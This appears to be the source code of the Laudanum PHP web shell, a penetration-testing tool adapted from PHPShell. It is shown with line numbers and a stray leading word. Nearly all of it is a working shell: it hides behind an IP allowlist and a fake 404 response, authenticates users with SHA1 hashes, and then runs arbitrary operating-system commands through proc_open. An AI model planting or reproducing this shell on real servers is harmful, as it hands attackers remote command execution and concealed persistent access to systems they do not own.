terst

1. <?php
2. /* *****************************************************************************
3. ***
4. *** Laudanum Project
5. *** A Collection of Injectable Files used during a Penetration Test
6. ***
7. *** More information is available at:
8. *** http://laudanum.secureideas.net
9. *** laudanum@secureideas.net
10. ***
11. *** Project Leads:
12. *** Kevin Johnson <kjohnson@secureideas.net>
13. *** Tim Medin <tim@counterhack.com>
14. ***
15. *** Copyright 2014 by Kevin Johnson and the Laudanum Team
16. ***
17. ********************************************************************************
18. ***
19. *** This file provides shell access to the system. It is built based on the 2.1
20. *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
21. *** <mgeisler[at]mgeisler.net>
22. ***
23. *** Updated by Tim Medin
24. ***
25. ********************************************************************************
26. *** This program is free software; you can redistribute it and/or
27. *** modify it under the terms of the GNU General Public License
28. *** as published by the Free Software Foundation; either version 2
29. *** of the License, or (at your option) any later version.
30. ***
31. *** This program is distributed in the hope that it will be useful,
32. *** but WITHOUT ANY WARRANTY; without even the implied warranty of
33. *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
34. *** GNU General Public License for more details.
35. ***
36. *** You can get a copy of the GNU General Public License from this
37. *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
38. *** You can also write to the Free Software Foundation, Inc., 59 Temple
39. *** Place - Suite 330, Boston, MA 02111-1307, USA.
40. ***
41. ***************************************************************************** */
42.  
43. // ***************** Config entries below ***********************
44.  
45. // IPs are enterable as individual addresses TODO: add CIDR support
46. $allowedIPs = array("192.168.1.55", "12.2.2.2");
47.  
48. # format is "username" => "password"
49. # password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)
50. # echo -n Password1 | sha1sum
51. $users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3");
52.  
53. # *********** No editable content below this line **************
54.  
55. $allowed = 0;
56. foreach ($allowedIPs as $IP) {
57. if ($_SERVER["REMOTE_ADDR"] == $IP)
58. $allowed = 1;
59. }
60.  
61. if ($allowed == 0) {
62. header("HTTP/1.0 404 Not Found");
63. die();
64. }
65.  
66.  
67.  
68. /* This error handler will turn all notices, warnings, and errors into fatal
69. * errors, unless they have been suppressed with the @-operator. */
70. function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
71. /* The @-opertor (used with chdir() below) temporarely makes
72. * error_reporting() return zero, and we don't want to die in that case.
73. * We do note the error in the output, though. */
74. if (error_reporting() == 0) {
75. $_SESSION['output'] .= $errstr . "\n";
76. } else {
77. die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
78. "http://www.w3.org/TR/html4/strict.dtd">
79. <html>
80. <head>
81. <title>Laudanum PHP Shell Access</title>
82. </head>
83. <body>
84. <h1>Fatal Error!</h1>
85. <p><b>' . $errstr . '</b></p>
86. <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
87.  
88. <hr>
89. <address>
90. Copyright &copy; 2014, <a
91. href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
92. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
93. </address>
94.  
95. </body>
96. </html>');
97. }
98. }
99.  
100. set_error_handler('error_handler');
101.  
102.  
103. function logout() {
104. $_SESSION = array('authenticated' => false);
105. if (isset($_COOKIE[session_name()]))
106. setcookie(session_name(), '', time()-42000, '/');
107. session_destroy();
108. }
109.  
110.  
111. function stripslashes_deep($value) {
112. if (is_array($value))
113. return array_map('stripslashes_deep', $value);
114. else
115. return stripslashes($value);
116. }
117.  
118. if (get_magic_quotes_gpc())
119. $_POST = stripslashes_deep($_POST);
120.  
121. /* Initialize some variables we need again and again. */
122. $username = isset($_POST['username']) ? $_POST['username'] : '';
123. $password = isset($_POST['password']) ? $_POST['password'] : '';
124. $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
125.  
126. $command = isset($_POST['command']) ? $_POST['command'] : '';
127. $rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
128. $columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
129.  
130.  
131. ///* Default settings --- these settings should always be set to something. */
132. //$default_settings = array('home-directory' => '.');
133.  
134. ///* Merge settings. */
135. //$ini['settings'] = array_merge($default_settings, $ini['settings']);
136.  
137.  
138. session_start();
139.  
140. /* Delete the session data if the user requested a logout. This leaves the
141. * session cookie at the user, but this is not important since we
142. * authenticates on $_SESSION['authenticated']. */
143. if (isset($_POST['logout']))
144. logout();
145.  
146. ///* Attempt authentication. */
147. //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
148. // isset($ini['users'][$username])) {
149. // if (strchr($ini['users'][$username], ':') === false) {
150. // // No seperator found, assume this is a password in clear text.
151. // $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
152. // } else {
153. // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
154. // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
155. // }
156. //}
157.  
158. /* Attempt authentication. */
159. if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
160. $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
161.  
162. /* Enforce default non-authenticated state if the above code didn't set it
163. * already. */
164. if (!isset($_SESSION['authenticated']))
165. $_SESSION['authenticated'] = false;
166.  
167. if ($_SESSION['authenticated']) {
168. /* Initialize the session variables. */
169. if (empty($_SESSION['cwd'])) {
170. $_SESSION['cwd'] = '.';
171. $_SESSION['history'] = array();
172. $_SESSION['output'] = '';
173. }
174.  
175. if (!empty($command)) {
176. /* Save the command for late use in the JavaScript. If the command is
177. * already in the history, then the old entry is removed before the
178. * new entry is put into the list at the front. */
179. if (($i = array_search($command, $_SESSION['history'])) !== false)
180. unset($_SESSION['history'][$i]);
181.  
182. array_unshift($_SESSION['history'], $command);
183.  
184. /* Now append the commmand to the output. */
185. $_SESSION['output'] .= '$ ' . $command . "\n";
186.  
187. /* Initialize the current working directory. */
188. if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
189. $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
190. } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
191. /* The current command is a 'cd' command which we have to handle
192. * as an internal shell command. */
193.  
194. if ($regs[1]{0} == '/') {
195. /* Absolute path, we use it unchanged. */
196. $new_dir = $regs[1];
197. } else {
198. /* Relative path, we append it to the current working
199. * directory. */
200. $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
201. }
202.  
203. /* Transform '/./' into '/' */
204. while (strpos($new_dir, '/./') !== false)
205. $new_dir = str_replace('/./', '/', $new_dir);
206.  
207. /* Transform '//' into '/' */
208. while (strpos($new_dir, '//') !== false)
209. $new_dir = str_replace('//', '/', $new_dir);
210.  
211. /* Transform 'x/..' into '' */
212. while (preg_match('|/\.\.(?!\.)|', $new_dir))
213. $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
214.  
215. if ($new_dir == '') $new_dir = '/';
216.  
217. /* Try to change directory. */
218. if (@chdir($new_dir)) {
219. $_SESSION['cwd'] = $new_dir;
220. } else {
221. $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
222. }
223.  
224. } elseif (trim($command) == 'exit') {
225. logout();
226. } else {
227.  
228. /* The command is not an internal command, so we execute it after
229. * changing the directory and save the output. */
230. chdir($_SESSION['cwd']);
231.  
232. // We canot use putenv() in safe mode.
233. if (!ini_get('safe_mode')) {
234. // Advice programs (ls for example) of the terminal size.
235. putenv('ROWS=' . $rows);
236. putenv('COLUMNS=' . $columns);
237. }
238.  
239. /* Alias expansion. */
240. $length = strcspn($command, " \t");
241. $token = substr($command, 0, $length);
242. if (isset($ini['aliases'][$token]))
243. $command = $ini['aliases'][$token] . substr($command, $length);
244.  
245. $io = array();
246. $p = proc_open($command,
247. array(1 => array('pipe', 'w'),
248. 2 => array('pipe', 'w')),
249. $io);
250.  
251. /* Read output sent to stdout. */
252. while (!feof($io[1])) {
253. $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
254. ENT_COMPAT, 'UTF-8');
255. }
256. /* Read output sent to stderr. */
257. while (!feof($io[2])) {
258. $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
259. ENT_COMPAT, 'UTF-8');
260. }
261.  
262. fclose($io[1]);
263. fclose($io[2]);
264. proc_close($p);
265. }
266. }
267.  
268. /* Build the command history for use in the JavaScript */
269. if (empty($_SESSION['history'])) {
270. $js_command_hist = '""';
271. } else {
272. $escaped = array_map('addslashes', $_SESSION['history']);
273. $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
274. }
275. }
276.  
277. ?>
278. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
279. "http://www.w3.org/TR/html4/strict.dtd">
280. <html>
281. <head>
282. <title>Laudanum Shell</title>
283. <link rel="stylesheet" href="style.css" type="text/css">
284.  
285. <script type="text/javascript">
286. <?php if ($_SESSION['authenticated']) { ?>
287.  
288. var current_line = 0;
289. var command_hist = new Array(<?php echo $js_command_hist ?>);
290. var last = 0;
291.  
292. function key(e) {
293. if (!e) var e = window.event;
294.  
295. if (e.keyCode == 38 && current_line < command_hist.length-1) {
296. command_hist[current_line] = document.shell.command.value;
297. current_line++;
298. document.shell.command.value = command_hist[current_line];
299. }
300.  
301. if (e.keyCode == 40 && current_line > 0) {
302. command_hist[current_line] = document.shell.command.value;
303. current_line--;
304. document.shell.command.value = command_hist[current_line];
305. }
306.  
307. }
308.  
309. function init() {
310. document.shell.setAttribute("autocomplete", "off");
311. document.shell.output.scrollTop = document.shell.output.scrollHeight;
312. document.shell.command.focus();
313. }
314.  
315. <?php } else { ?>
316.  
317. function init() {
318. document.shell.username.focus();
319. }
320.  
321. <?php } ?>
322. </script>
323. </head>
324.  
325. <body onload="init()">
326.  
327. <h1>Laudanum Shell</h1>
328.  
329. <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
330.  
331. <?php
332. if (!$_SESSION['authenticated']) {
333. /* Genereate a new nounce every time we preent the login page. This binds
334. * each login to a unique hit on the server and prevents the simple replay
335. * attack where one uses the back button in the browser to replay the POST
336. * data from a login. */
337. $_SESSION['nounce'] = mt_rand();
338.  
339. ?>
340.  
341. <fieldset>
342. <legend>Authentication</legend>
343.  
344. <?php
345. if (!empty($username))
346. echo ' <p class="error">Login failed, please try again:</p>' . "\n";
347. else
348. echo " <p>Please login:</p>\n";
349. ?>
350.  
351. <p>Username: <input name="username" type="text" value="<?php echo $username
352. ?>"></p>
353.  
354. <p>Password: <input name="password" type="password"></p>
355.  
356. <p><input type="submit" value="Login"></p>
357.  
358. <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
359.  
360. </fieldset>
361.  
362. <?php } else { /* Authenticated. */ ?>
363.  
364. <fieldset>
365. <legend>Current Working Directory: <code><?php
366. echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
367. ?></code></legend>
368.  
369.  
370. <div id="terminal">
371. <textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
372. <?php
373. $lines = substr_count($_SESSION['output'], "\n");
374. $padding = str_repeat("\n", max(0, $rows+1 - $lines));
375. echo rtrim($padding . $_SESSION['output']);
376. ?>
377. </textarea>
378. <p id="prompt">
379. $&nbsp;<input name="command" type="text"
380. onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
381. </p>
382. </div>
383.  
384. <p>
385. <span style="float: right">Size: <input type="text" name="rows" size="2"
386. maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
387. name="columns" size="2" maxlength="3" value="<?php echo $columns
388. ?>"></span>
389.  
390. <input type="submit" value="Execute Command">
391. <input type="submit" name="logout" value="Logout">
392. </p>
393.  
394. </fieldset>
395.  
396. <?php } ?>
397.  
398. </form>
399.  
400.  
401. <hr/>
402. <address>
403. Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
404. Updated by Tim Medin.<br/>
405. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
406. </address>
407.  
408. </body>
409. </html>